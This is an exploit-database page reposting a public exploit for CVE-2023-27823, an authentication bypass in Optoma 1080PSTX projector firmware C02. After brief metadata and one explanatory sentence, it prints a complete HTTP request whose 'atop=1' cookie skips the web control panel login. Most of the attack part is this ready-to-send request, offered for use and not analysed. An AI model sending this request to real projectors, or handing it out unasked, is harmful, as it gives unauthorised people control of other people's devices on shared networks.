Optoma 1080PSTX Firmware C02 Authentication Bypass

CVE Category Price Severity
CVE-2023-27823 CWE-287 $5,000 Critical
Author Risk Exploitation Type Date
Unknown High Remote 2023-05-10

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

Optoma 1080PSTX Firmware C02 Authentication Bypass
# Exploit Title: Optoma 1080PSTX Firmware C02 - Auth Bypass
# Date: 2023/05/09
# Exploit Author: Anthony Cole
# Contact:
# Website:
# Vendor Homepage:
# Version: Optoma 1080PSTX Firmware C02
# Tested on: N/A
# CVE : CVE-2023-27823

By default the web interface of the 1080PSTX requires a username and password to access the application control panel.  However, an attacker, on the same network, can bypass it by manually setting the "atop" cookie to the value of "1".

GET /index.asp HTTP/1.1
Host: projector
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: atop=1
Connection: close

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.